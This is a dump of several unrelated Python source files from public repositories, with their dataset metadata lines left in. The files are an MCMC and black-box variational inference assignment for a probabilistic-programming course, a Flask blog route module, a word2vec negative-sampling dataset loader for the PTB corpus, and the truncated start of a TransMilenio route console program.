False))\n return node_order_reverse[::-1]\n\n# Put all function mappings from the deterministic language environment to your\n# Python evaluation context here:\nenv = {**baseprimitives, **distlist}\n\ndef deterministic_eval(exp):\n \"Evaluation function for the deterministic target language of the graph based representation.\"\n if isinstance(exp, list):\n if exp[0] == 'hash-map':\n exp = ['hash-map'] + [value for expression in exp[1:] for value in expression]\n return evaluate_program(exp)\n\ndef value_subs(expressions, variables):\n if isinstance(expressions, list):\n result = []\n for expression in expressions:\n result.append(value_subs(expression, variables))\n else:\n if expressions in variables:\n result = variables[expressions]\n else:\n result = expressions\n return result\n\ndef sample_from_joint(graph, var=False):\n \"This function does ancestral sampling starting from the prior.\"\n node_order = topological_sort(graph)\n results = {}\n for node in node_order:\n first_statement, *other_statements = graph[1]['P'].get(node)\n if first_statement == 'sample*':\n dist = deterministic_eval(value_subs(other_statements, results))\n result = dist.sample()\n if first_statement == 'observe*':\n result = deterministic_eval(graph[1]['Y'].get(node))\n results[node] = result\n \n if var:\n return results\n else:\n return deterministic_eval(value_subs(graph[2], results))\n\n# MH with Gibbs sampling\n\ndef mh_within_gibbs_sampling(graph, num_samples):\n \n _, unobserved_variables 
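# Illustrative note (toy input, not part of the source): topological_sort above
# consumes the daphne graph layout graph[1] = {'V': nodes, 'A': adjacency, 'P': link
# functions, 'Y': observations}. For a hypothetical graph
#   toy = [None, {'V': ['a', 'b', 'c'], 'A': {'a': ['b'], 'b': ['c']}, 'P': {}, 'Y': {}}, None]
# topological_sort(toy) returns ['a', 'b', 'c']: every node comes before the nodes
# that depend on it, which is exactly what ancestral sampling in sample_from_joint needs.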
= extract_variables(graph)\n _, free_variables_inverse = extract_free_variables(graph)\n\n values = [sample_from_joint(graph, var=True)]\n for _ in range(num_samples):\n values.append(gibbs_step(graph[1]['P'], unobserved_variables, values[-1], free_variables_inverse))\n\n sample_temp = deterministic_eval(value_subs(graph[2], values[0]))\n n_params = 1\n if sample_temp.dim() != 0:\n n_params = len(sample_temp)\n samples = torch.zeros(n_params, num_samples+1)\n\n for idx, value in enumerate(values):\n sample = deterministic_eval(value_subs(graph[2], value))\n samples[:, idx] = sample\n return samples, values\n\n\ndef extract_variables(graph):\n observed_variables = []\n for node in graph[1]['V']:\n if graph[1]['P'].get(node)[0] == 'observe*':\n observed_variables.append(node)\n unobserved_variables = [v for v in graph[1]['V'] if v not in observed_variables]\n return observed_variables, unobserved_variables\n\n\ndef extender(l):\n if isinstance(l, list):\n return sum([extender(e) for e in l], [])\n else:\n return [l]\n\ndef extract_free_variables(graph):\n free_variables = {}\n for node in graph[1]['V']:\n expressions = extender(graph[1]['P'].get(node)[1])\n for expression in expressions:\n if expression != node:\n if expression in graph[1]['V']:\n if node in free_variables:\n free_variables[node].append(expression)\n else:\n free_variables[node] = [expression]\n free_var_inverse = {} \n for node in graph[1]['V']:\n for variable in free_variables:\n if node in free_variables[variable]:\n if node not in free_var_inverse:\n free_var_inverse[node] = []\n free_var_inverse[node].append(variable)\n return free_variables, free_var_inverse\n\n\ndef gibbs_step(p, unobserved_variables, value, free_var_inverse):\n for selected_variable in unobserved_variables:\n q = deterministic_eval(value_subs(p[selected_variable][1], value))\n value_new = value.copy()\n value_new[selected_variable] = q.sample()\n alpha = mh_accept(p, selected_variable, value_new, value, free_var_inverse)\n if alpha > torch.rand(1):\n value = value_new\n return value\n\n\ndef mh_accept(p, selected_variable, value_new, value_old, free_var_inverse):\n q_new = deterministic_eval(value_subs(p[selected_variable][1], value_new))\n q_old = deterministic_eval(value_subs(p[selected_variable][1], value_old))\n\n log_q_new = q_new.log_prob(value_old[selected_variable])\n log_q_old = q_old.log_prob(value_new[selected_variable])\n\n log_alpha = log_q_new - log_q_old\n\n Vx = free_var_inverse[selected_variable] + [selected_variable]\n for v in Vx:\n log_alpha += deterministic_eval(value_subs(p[v][1], value_new)).log_prob(value_new[v])\n log_alpha -= deterministic_eval(value_subs(p[v][1], value_old)).log_prob(value_old[v])\n log_alpha = torch.clip(log_alpha, max=0)\n return torch.exp(log_alpha)\n\n# Hamiltonian Monte Carlo\n\ndef hmc(graph, num_samples=1000, num_leapfrog_steps=10, epsilon=0.1, M=None):\n list_observed_variables, list_unobserved_variables = extract_variables(graph)\n initial_variable_values = sample_from_joint(graph, var=True)\n\n observed_variables = {}\n unobserved_variables = {}\n for variable in initial_variable_values:\n if variable in list_observed_variables:\n observed_variables[variable] = initial_variable_values[variable]\n else:\n unobserved_variables[variable] = initial_variable_values[variable]\n if not torch.is_tensor(unobserved_variables[variable]):\n unobserved_variables[variable] = torch.tensor(unobserved_variables[variable], dtype=torch.float64)\n else:\n unobserved_variables[variable] = 
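# Illustrative note (standalone sketch, not part of the source): mh_accept above
# relies on exp(min(log_alpha, 0)) == min(1, alpha), so comparing the clipped
# ratio against a uniform draw is the standard Metropolis-Hastings accept step:
#   log_alpha = torch.tensor(-1.0)                   # alpha = exp(-1) ~= 0.37
#   alpha = torch.exp(torch.clip(log_alpha, max=0))  # clipped at 1 when alpha > 1
#   accept = alpha > torch.rand(1)                   # accept with prob ~0.37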
unobserved_variables[variable].type(torch.float64)\n unobserved_variables[variable].requires_grad = True\n\n if M is None:\n M = torch.eye(len(list_unobserved_variables))\n \n M_inverse = torch.inverse(M)\n P = graph[1]['P']\n samples = []\n\n normal_generator = torch.distributions.MultivariateNormal(torch.zeros(len(M)), M)\n for _ in range(num_samples):\n r = normal_generator.sample()\n new_unobserved_variables, new_r = leapfrog(P, num_leapfrog_steps, epsilon, copy.deepcopy(unobserved_variables), observed_variables, r)\n u = torch.rand(1)\n current_energy = energy(P, M_inverse, unobserved_variables, observed_variables, r)\n new_energy = energy(P, M_inverse, new_unobserved_variables, observed_variables, new_r)\n\n energy_diff = current_energy - new_energy\n energy_diff_clip = torch.clip(energy_diff, max=0)\n if u < torch.exp(energy_diff_clip):\n unobserved_variables = new_unobserved_variables\n\n samples.append(unobserved_variables)\n\n\n sample_temp = deterministic_eval(value_subs(graph[2], samples[0]))\n n_params = 1\n if sample_temp.dim() != 0:\n n_params = len(sample_temp)\n final_samples = torch.zeros(n_params, num_samples)\n\n for idx, sample in enumerate(samples):\n final_sample = deterministic_eval(value_subs(graph[2], sample))\n final_samples[:, idx] = final_sample\n\n return final_samples, samples\n\ndef energy(P, M_inverse, unobserved_variables, observed_variables, r):\n K = torch.matmul(r, torch.matmul(M_inverse, r)) * 0.5\n\n U = 0\n\n all_variables = {**observed_variables, **unobserved_variables}\n for variable in all_variables:\n U = U - deterministic_eval(value_subs(P[variable][1], {**unobserved_variables, **observed_variables})).log_prob(all_variables[variable])\n\n return K + U\n\ndef leapfrog(P, num_leapfrog_steps, epsilon, unobserved_variables, observed_variables, r):\n r_half = r - 0.5*epsilon*grad_energy(P, unobserved_variables, observed_variables)\n new_unobserved_variables = unobserved_variables\n for _ in range(num_leapfrog_steps):\n new_unobserved_variables = detach_and_add_dict_vector(new_unobserved_variables, epsilon*r_half)\n r_half = r_half - epsilon*grad_energy(P, new_unobserved_variables, observed_variables)\n final_unobserved_variables = detach_and_add_dict_vector(new_unobserved_variables, epsilon*r_half)\n final_r = r_half - 0.5*epsilon*grad_energy(P, final_unobserved_variables, observed_variables)\n return final_unobserved_variables, final_r\n\ndef detach_and_add_dict_vector(dictionary, vector):\n new_dictionary = {}\n for i, key in enumerate(list(dictionary.keys())):\n new_dictionary[key] = dictionary[key].detach() + vector[i]\n new_dictionary[key].requires_grad = True\n return new_dictionary\n\ndef grad_energy(P, unobserved_variables, observed_variables):\n U = 0\n for variable in observed_variables:\n U -= deterministic_eval(value_subs(P[variable][1], {**unobserved_variables, **observed_variables})).log_prob(observed_variables[variable])\n U.backward()\n\n U_gradients = torch.zeros(len(unobserved_variables))\n for i, key in enumerate(list(unobserved_variables.keys())):\n U_gradients[i] = unobserved_variables[key].grad\n return U_gradients\n\n\ndef BBVI_evaluator(order_node, graph, sigma):\n P = graph[1]['P']\n Y = graph[1]['Y']\n Q = sigma['Q']\n G = sigma['G']\n optimizer = sigma['optimizer']\n results = {}\n\n for node in order_node:\n link_function = P[node][0]\n\n if link_function == 'sample*':\n d = deterministic_eval(value_subs(P[node][1], results))\n if node not in Q:\n Q[node] = d.make_copy_with_grads()\n optimizer[node] = 
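# Illustrative note (standalone sketch, not part of the source): the leapfrog
# integrator above should approximately conserve the energy it integrates. For a
# 1D standard Gaussian potential U(x) = x**2 / 2 (so grad U(x) = x):
#   x, r, eps = 1.0, 0.5, 0.1
#   h0 = 0.5 * x**2 + 0.5 * r**2
#   r -= 0.5 * eps * x              # initial half kick
#   for _ in range(10):
#       x += eps * r                # drift
#       r -= eps * x                # full kick
#   r += 0.5 * eps * x              # roll the last kick back to a half step
#   h1 = 0.5 * x**2 + 0.5 * r**2    # h1 stays within O(eps**2) of h0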
torch.optim.Adam(Q[node].parameters(), lr=0.01)\n result = Q[node].sample()\n G[node] = grad_log_prob(Q[node], result)\n try:\n sigma_temp = d.log_prob(result) - Q[node].log_prob(result)\n sigma['logW'] += sigma_temp\n except Exception:\n sigma['logW'] += 0\n \n elif link_function == 'observe*':\n result = torch.tensor(Y[node])\n d = deterministic_eval(value_subs(P[node][1], results))\n sigma_temp = d.log_prob(result)\n sigma['logW'] += sigma_temp\n \n results[node] = result\n \n return results, sigma\n\ndef grad_log_prob(dist, value):\n for param in dist.parameters():\n param = param.clone().detach()\n param.requires_grad = True\n log_prob = dist.log_prob(value)\n log_prob.backward()\n grad = [param.grad for param in dist.parameters()]\n return grad\n\ndef BBVI(graph, T, L):\n sigma = {'Q':{}, 'optimizer':{}}\n order_node = topological_sort(graph)\n \n results = []\n log_weights = []\n posteriors = []\n\n for t in range(T):\n sigma['G'] = {}\n gradients = []\n log_ws = []\n\n for l in range(L):\n sigma['logW'] = 0\n result, sigma = BBVI_evaluator(order_node, graph, sigma)\n gradients.append(copy.deepcopy(sigma['G']))\n log_ws.append(sigma['logW'])\n\n if t==0:\n posteriors.append(copy.deepcopy(sigma['Q']['sample2'].parameters()))\n \n ELBO_gradients(gradients, log_ws, sigma['Q'])\n\n for optimizer in sigma['optimizer'].values():\n optimizer.step()\n optimizer.zero_grad()\n \n post_temp = {}\n for q in sigma['Q']:\n post_temp[q] = sigma['Q'][q].parameters().copy()\n\n posteriors.append(post_temp)\n result_temp = deterministic_eval(value_subs(graph[2], result))\n results.append(result_temp)\n log_weights.append(log_ws[-1])\n wandb.log({'ELBO': torch.mean(torch.stack(log_weights)).detach().numpy()})\n\n return results, log_weights, posteriors\n\ndef inf_skipper(gradients, log_ws):\n temp_gradients = []\n temp_log_ws = []\n\n for i in range(len(log_ws)):\n if log_ws[i] == float('-inf'):\n continue\n temp_gradients.append(gradients[i])\n temp_log_ws.append(log_ws[i])\n \n return temp_gradients, temp_log_ws\n\ndef ELBO_gradients(gradients, log_ws, posteriors):\n \n gradients, log_ws = inf_skipper(gradients, log_ws)\n len_grads = len(gradients)\n\n var_union = list(set([var for grad in gradients for var in grad]))\n \n Fs = []\n Gs = []\n stack = {}\n\n for var in var_union:\n gradient_var = gradients[0][var]\n if len(gradient_var[0].shape) > 0 and len(gradient_var[0]) > 1:\n gradient_var = [grad.clone().detach().requires_grad_(True) for grad in gradient_var[0]]\n stack[var] = len(gradient_var)\n\n len_vars = len(gradient_var)\n\n G_var = torch.zeros((len_grads, len_vars))\n F_var = torch.zeros((len_grads, len_vars))\n\n for lg in range(len_grads):\n G_var[lg, :] = torch.stack(gradients[lg][var])\n F_var[lg, :] = G_var[lg, :] * log_ws[lg]\n Gs.append(G_var.detach().numpy())\n Fs.append(F_var.detach().numpy())\n \n Gs = np.column_stack(Gs)\n Fs = np.column_stack(Fs)\n \n num = np.sum([np.cov(Fs[:, v], Gs[:, v])[0, 1] for v in range(Gs.shape[1])])\n denum = np.sum([np.var(Gs[:, v]) for v in range(Gs.shape[1])])\n b_hat = 0.\n if not denum == 0. 
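# Illustrative note (toy numbers, standalone): the baseline computed here is the
# usual control variate for score-function ELBO gradients,
#   b_hat = sum_v cov(F[:, v], G[:, v]) / sum_v var(G[:, v]),
# and each parameter's gradient estimate is mean_l(F[l, v] - b_hat * G[l, v]).
# For example, with F = [[1., 2.], [3., 4.]] and G = [[.5, 1.], [1.5, 2.]]:
#   num = np.cov(F[:, 0], G[:, 0])[0, 1] + np.cov(F[:, 1], G[:, 1])[0, 1]
#   denum = np.var(G[:, 0]) + np.var(G[:, 1])
#   g_hat = (F - (num / denum) * G).mean(axis=0)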
and not np.isnan(num):\n b_hat = num/denum\n\n counter_1 = 0\n for var in var_union:\n gradient_var = gradients[0][var]\n counter_2 = len(gradient_var)\n if var in stack:\n counter_2 = stack[var]\n g_hat = np.array([np.sum(Fs[:, v] - b_hat * Gs[:, v]) / len_grads for v in range(counter_1, counter_1+counter_2)])\n if var in stack:\n g_hat = [g_hat]\n for i, parameter in enumerate(posteriors[var].parameters()):\n parameter.grad = torch.tensor(-g_hat[i], dtype=parameter.grad.dtype)\n counter_1 += counter_2\n return\ndef get_stream(graph):\n \"\"\"Return a stream of prior samples\n Args: \n graph: json graph as loaded by daphne wrapper\n Returns: a python iterator with an infinite stream of samples\n \"\"\"\n while True:\n yield sample_from_joint(graph)\n\n\n\n\n#Testing:\n\ndef run_deterministic_tests():\n \n for i in range(1,13):\n #note: this path should be with respect to the daphne path!\n graph = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/deterministic/test_{}.daphne'.format(i)])\n truth = load_truth('/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/deterministic/test_{}.truth'.format(i))\n ret = deterministic_eval(graph[-1])\n print(ret)\n try:\n assert(is_tol(ret, truth))\n except AssertionError:\n raise AssertionError('return value {} is not equal to truth {} for graph {}'.format(ret,truth,graph))\n \n print('Test passed')\n \n print('All deterministic tests passed')\n \n\n\ndef run_probabilistic_tests():\n \n #TODO: \n num_samples=1e4\n max_p_value = 1e-4\n \n for i in range(1,7):\n #note: this path should be with respect to the daphne path! \n graph = daphne(['graph', '-i', '/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/probabilistic/test_{}.daphne'.format(i)])\n\n truth = load_truth('/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_3/programs/tests/probabilistic/test_{}.truth'.format(i))\n \n stream = get_stream(graph)\n \n p_val = run_prob_test(stream, truth, num_samples)\n \n print('p value', p_val)\n assert(p_val > max_p_value)\n \n print('All probabilistic tests passed') \n \n \nif __name__ == '__main__':\n \n\n # run_deterministic_tests()\n # run_probabilistic_tests()\n\n # Task 1\n # graph_1 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(1)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(1)) \n # T_1 = int(1 * 1e4)\n # L_1 = 50\n # start_time_1 = time.time()\n # samples_1, log_weights_1, posteriors_1 = BBVI(graph_1, T_1, L_1)\n # print('Time taken:', time.time() - start_time_1)\n # samples_1 = torch.stack(samples_1).numpy()\n # weights_1 = np.exp(torch.stack(log_weights_1).detach().numpy())\n\n # print(posteriors_1[-1]['sample2'])\n\n # new_samples = torch.distributions.Normal(*posteriors_1[-1]['sample2']).sample((10000,)).view(1,-1)\n # draw_hists('BBVI', new_samples, 1)\n\n\n # Task 2\n # graph_2 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(2)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(2)) \n # T_2 = int(1 * 1e4)\n # L_2 = 50\n # start_time_2 = time.time()\n # samples_2, log_weights_2, posteriors_2 = 
BBVI(graph_2, T_2, L_2)\n # print('Time taken:', time.time() - start_time_2)\n # samples_2 = torch.stack(samples_2).numpy()\n # weights_2 = np.exp(torch.stack(log_weights_2).detach().numpy())\n \n # samples_mean_slope = (samples_2[:,0] * weights_2).sum() / weights_2.sum()\n\n # samples_mean_bias = (samples_2[:,1] * weights_2).sum() / weights_2.sum()\n \n # print(samples_mean_slope)\n # print(samples_mean_bias)\n\n # # Task 3\n # graph_3 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(3)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(3)) \n # T_3 = int(2 * 1e3)\n # L_3 = 50\n # start_time_3 = time.time()\n # samples_3, log_weights_3, posteriors_3 = BBVI(graph_3, T_3, L_3)\n # print('Time taken:', time.time() - start_time_3)\n # samples_3 = torch.stack(samples_3).numpy()\n # weights_3 = np.exp(torch.stack(log_weights_3).detach().numpy())\n \n # samples_mean = (samples_3 * weights_3.reshape(-1,1)).sum(axis=0) / weights_3.sum()\n \n # print(samples_mean)\n\n # Task 4\n # graph_4 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(4)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(4)) \n # T_4 = int(2 * 1e2)\n # L_4 = 50\n # start_time_4 = time.time()\n # samples_4, log_weights_4, posteriors_4 = BBVI(graph_4, T_4, L_4)\n # print('Time taken:', time.time() - start_time_4)\n # w_0 = np.zeros((10,1))\n # b_0 = np.zeros((10,1))\n # w_1 = np.zeros((10,10))\n # b_1 = np.zeros((10,1))\n\n # weights = np.exp(torch.stack(log_weights_4).detach().numpy())\n # for i, sample in enumerate(samples_4):\n # w_0 += sample[0].numpy() * weights[i]\n # b_0 += sample[1].numpy() * weights[i]\n # w_1 += sample[2].numpy() * weights[i]\n # b_1 += sample[3].numpy() * weights[i]\n\n # sum_weights = weights.sum()\n\n # w_0 /= sum_weights\n # b_0 /= sum_weights\n # w_1 /= sum_weights\n # b_1 /= sum_weights\n\n # draw_hitmap('BBVI', w_0, '4_w0')\n # draw_hitmap('BBVI', b_0, '4_b0')\n # draw_hitmap('BBVI', w_1, '4_w1')\n # draw_hitmap('BBVI', b_1, '4_b1')\n\n\n # Task 5\n graph_5 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(5)])\n print('\\n\\n\\nSample of posterior of program {}:'.format(5))\n T_5 = int(2 * 1e3)\n L_5 = 25\n start_time_5 = time.time()\n samples_5, log_weights_5, posteriors_5 = BBVI(graph_5, T_5, L_5)\n print('Time taken:', time.time() - start_time_5)\n\n print(posteriors_5[-1]['sample2'])\n new_samples = torch.distributions.Uniform(*posteriors_5[-1]['sample2']).sample((10000,)).view(1,-1)\n draw_hists('BBVI', new_samples, 5)","repo_name":"aliseyfi75/Probabilistic-Programming","sub_path":"Assignment_4/graph_based_sampling.py","file_name":"graph_based_sampling.py","file_ext":"py","file_size_in_byte":20920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35566306940","text":"from routes import *\nfrom models.blog import \\\n Blog, Comment\nfrom models.node import Node\n\n\nmain = Blueprint('blog', __name__)\n\n\ndef data_time():\n format = '%H:%M:%S'\n value = time.localtime(int(time.time()))\n dt = time.strftime(format, value)\n return dt\n\n\n\n@main.route('/')\ndef index():\n '''\n Show blogs for the node the user clicked.\n Defaults to all blogs.\n 1. Get all Node objects.\n 2. Return the blogs that belong to the selected node.\n '''\n ns = Node.query.all()\n form = 
request.args\n bid = form.get('board_id', None)\n if bid is not None:\n # bs = Blog.query.filter_by(board_id=bid).all()\n node = Node.query.get(bid)\n log('node: ', node)\n bs = node.node_blog\n log('blog index, node blogs: {}'.format(bs))\n return render_template('blog_index.html', nodes=ns, blog=bs)\n else:\n bs = Blog.query.all()\n return render_template('blog_index.html', blog=bs, nodes=ns)\n\n\n@main.route('/detail/')\ndef detail(id):\n u = current_user()\n ms = Blog.query.get(id)\n cm = ms.comments\n log('all comments:', cm)\n return render_template('blog_detail.html', b=ms, user=u, comment=cm)\n\n\n@main.route('/new')\n@login_required\ndef new():\n u = current_user()\n log('posting a new blog', u.id, u.username)\n # get all board ids\n bid = Node.query.all()\n log('new blog board ids', bid)\n return render_template('blog_new.html', user=u, board=bid)\n\n\n@main.route('/add', methods=['post'])\ndef add():\n form = request.form\n log('blog add form.get(parent_id)', form.get('user_img', 0))\n Blog.new(form)\n return redirect(url_for('.index'))\n\n\n@main.route('/delete/')\ndef delete(id):\n print('delete id', id)\n Blog.delete(id)\n return redirect(url_for('.index'))\n\n\n@main.route('/comment/fa', methods=['post'])\n@login_required\ndef comment_fa():\n form = request.form\n log('comment fa', form)\n bid = form.get('blog_id', -1)\n blog = Blog.query.get(bid)\n blog.comment_len()\n Comment.new(form)\n return redirect('/detail/{}'.format(bid))","repo_name":"Ak46/bbs","sub_path":"routes/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43395522346","text":"from torch.utils.data import Dataset, DataLoader\nimport collections\nimport random\nimport math\nimport numpy as np\n\n\nclass PTBDataSet(Dataset):\n def __init__(self, count_least=5, t=1e-4, max_window_size=5, negative_sampling_num=5):\n \"\"\"\n :param count_least: for simplicity, keep only words that occur at least count_least times in the dataset.\n :param t: subsampling threshold\n :param max_window_size: maximum context window size\n :param negative_sampling_num: number K of noise words sampled for each (center, context) pair\n \"\"\"\n super(PTBDataSet, self).__init__()\n\n self.count_least = count_least\n self.t = t\n self.max_window_size = max_window_size\n self.negative_sampling_num = negative_sampling_num\n\n self.counter, self.index_to_token, self.token_to_index, self.dataset = self.load_text()\n self.centers, self.contexts_negatives, self.masks, self.labels = self.data_prepare()\n print(self.centers.shape, self.contexts_negatives.shape, self.masks.shape, self.labels.shape)\n\n def get_token_num(self):\n return len(self.index_to_token)\n\n def __len__(self):\n return self.centers.shape[0]\n\n def __getitem__(self, index):\n return [self.centers[index], self.contexts_negatives[index], self.masks[index], self.labels[index]]\n\n def load_text(self):\n with open('./data/ptb.train.txt', 'r') as f:\n text = f.readlines()\n raw_dataset = [sentence.split() for sentence in text]\n counter = collections.Counter([token for sentence in raw_dataset for token in sentence])\n # counter: {token: number_of_token}\n counter = dict(filter(lambda x: x[1] >= self.count_least, counter.items()))\n # index_to_token: [token1, token2, ..., tokenN]\n index_to_token = list(counter.keys())\n # token_to_index: {token: token_index}\n token_to_index = {token: index for index, token in enumerate(counter)}\n \"\"\"\n dataset: [[sentence1],\n [sentence2],\n ...\n [sentenceN]]\n all tokens in sentences are numbers(indices)\n \"\"\"\n dataset = [[token_to_index[token] for token in sentence if token in token_to_index] for sentence in\n raw_dataset]\n return counter, index_to_token, token_to_index, dataset\n
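# Illustrative note (toy data, standalone): load_text above builds three aligned
# vocabulary structures. For raw sentences [["the", "cat"], ["the", "dog"]]:
#   counter = collections.Counter(t for s in raw for t in s)   # {'the': 2, 'cat': 1, 'dog': 1}
#   index_to_token = list(counter.keys())                      # ['the', 'cat', 'dog']
#   token_to_index = {t: i for i, t in enumerate(counter)}     # {'the': 0, 'cat': 1, 'dog': 2}
#   dataset = [[0, 1], [0, 2]]                                 # sentences re-encoded as indices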
\n def data_prepare(self):\n\n token_num = sum([len(sentence) for sentence in self.dataset])\n sub_dataset = [\n [token for token in sentence if not self.discard(token, token_num)] for\n sentence in self.dataset]\n print('token in sub_dataset', sum([len(sentence) for sentence in sub_dataset]))\n \"\"\"\n all_centers: [center1, center2, ..., centerN]\n all_contexts: [[contexts1],\n [contexts2],\n ...\n [contextsN]]\n \"\"\"\n all_centers, all_contexts = self.get_centers_contexts(sub_dataset, self.max_window_size)\n sampling_weights = [self.counter[token] ** 0.75 for token in self.token_to_index]\n \"\"\"\n all_negatives: [[negative1],\n [negative2],\n ...\n [negativeN]]\n \"\"\"\n all_negatives = self.get_negatives(all_contexts, sampling_weights, self.negative_sampling_num)\n return self.padding(all_centers=all_centers, all_contexts=all_contexts, all_negatives=all_negatives)\n # return all_centers, all_contexts, all_negatives\n # return np.array(all_centers), np.array(all_contexts), np.array(all_negatives)\n\n def discard(self, token_index, token_num):\n return random.uniform(0, 1) < max(\n [0, 1 - math.sqrt(self.t / (self.counter[self.index_to_token[token_index]] / token_num))])\n\n def get_centers_contexts(self, dataset, max_window_size):\n centers, contexts = [], []\n for sentence in dataset:\n if len(sentence) < 2:\n continue\n centers += sentence\n for center_word_index in range(len(sentence)):\n # [1, max_window_size]\n window_size = random.randint(1, max_window_size)\n # [center_word - window_size, center_word + window_size]\n indices = list(\n range(max([0, center_word_index - window_size]),\n min([len(sentence), center_word_index + window_size + 1])))\n indices.remove(center_word_index)\n contexts.append([sentence[i] for i in indices])\n return centers, contexts\n\n def get_negatives(self, all_contexts, sampling_weights, K):\n \"\"\"\n We use negative sampling for approximate training: for each (center, context) pair we randomly sample K noise words (K=5 in the experiments).\n Following the word2vec paper, the sampling probability P(w) of a noise word is its frequency over the total frequency, raised to the power 0.75.\n :param all_contexts: positive samples\n :param sampling_weights: sampling probabilities\n :param K: number of noise words per context word\n :return:\n \"\"\"\n all_negatives, neg_candidates, i = [], [], 0\n population = list(range(len(sampling_weights)))\n for context in all_contexts:\n negatives = []\n while len(negatives) < K * len(context):\n if i == len(neg_candidates):\n i = 0\n neg_candidates = random.choices(population=population, weights=sampling_weights, k=int(1e5))\n neg, i = neg_candidates[i], i + 1\n if neg not in set(context):\n negatives += [neg]\n all_negatives.append(negatives)\n return all_negatives\n\n def padding(self, all_centers, all_contexts, all_negatives):\n \"\"\"\n Pad every training example to the same length.\n :param all_centers:\n :param all_contexts:\n :param all_negatives:\n :return: centers: center words, shape: (centers,)\n contexts_negatives: context and noise words, shape: (centers, max_len)\n masks: 1 => real entry; 0 => padding, shape: (centers, max_len)\n labels: 1 => positive sample (context word); 0 => negative sample (noise word), shape: (centers, max_len)\n \"\"\"\n max_len = self.max_window_size * 2 + self.max_window_size * 2 * self.negative_sampling_num\n centers, contexts_negatives, masks, labels = [], [], [], []\n for center, context, negative in zip(all_centers, all_contexts, all_negatives):\n cur_len = len(context) + len(negative)\n centers.append(center)\n contexts_negatives += [context + negative + [0] * (max_len - cur_len)]\n masks += [cur_len * [1] + (max_len - cur_len) * [0]]\n labels += [len(context) * [1] + (max_len - len(context)) * [0]]\n return np.array(centers), np.array(contexts_negatives), np.array(masks), np.array(labels)\n
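# Illustrative note (toy numbers, standalone): for one training example with
# context = [7, 8], negative = [3, 9, 4] and max_len = 6, padding above yields
#   contexts_negatives row: [7, 8, 3, 9, 4, 0]   (contexts, then negatives, then padding)
#   mask row:               [1, 1, 1, 1, 1, 0]   (0 marks the padded slot)
#   label row:              [1, 1, 0, 0, 0, 0]   (1 only for the true context words)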
\n\nif __name__ == '__main__':\n train_set = PTBDataSet()\n train_loader = DataLoader(train_set, batch_size=512, shuffle=True)\n for batch_idx, (center, context_negative, mask, label) in enumerate(train_loader):\n print('center', center.shape)\n print('context_negative', context_negative.shape)\n print('mask', mask.shape)\n print('label', label.shape)\n break\n","repo_name":"toooooodo/pytorch-word2vec","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71017050078","text":"from manejarJSON import *\nfrom manejarJSON_UPZ import *\n\ndef main():\n print(\"\\033[3;35m\" + \" WELCOME TO THE TRANSMILENIO STATIONS PROGRAM\")\n\n\n objetoJSON = ManejarJSON()\n print(\"\\033[1;37m | \" + \"We currently only have connections between the following trunk lines: \")\n objetoJSON.leerRutas()\n objetoJSON.imprimirRutas()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n rutaElegida = int(input(\"\\033[1;33m\" + \"Enter the route number: \"))\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoJSON.leerRuta(rutaElegida)\n objetoJSON.imprimirRuta()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n direccionElegida = input(\"\\033[1;33m\" + \"Enter the number of the direction you are heading: \")\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n troncalLetraOrigen = objetoJSON.obtenerTroncalOrigen(direccionElegida)\n troncalLetraDestino = objetoJSON.obtenerTroncalDestino(direccionElegida)\n objetoJSON.leerEstaciones(troncalLetraOrigen)\n objetoJSON.imprimirEstaciones()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n estacionNumeroOrigen = int(input(\"\\033[1;33m\" + \"Enter the # of the origin station where you are: \"))\n estacionNombreOrigen = objetoJSON.imprimirEstacion(estacionNumeroOrigen)\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoJSON.leerEstaciones(troncalLetraDestino)\n objetoJSON.imprimirEstaciones()\n print(\"\\033[1;33m\" + \"------------------------------------------------------------\")\n estacionNumeroDestino = int(input(\"\\033[1;33m\" + \"Enter the # of the destination station: \"))\n estacionNombreDestino = objetoJSON.imprimirEstacion(estacionNumeroDestino)\n print(\"\\033[1;33m\" + \"------------------------------------------------------------\")\n tuplaViaje = (estacionNumeroOrigen, estacionNumeroDestino, direccionElegida)\n\n print()\n print(\"\\033[2;36m\" + \"You 
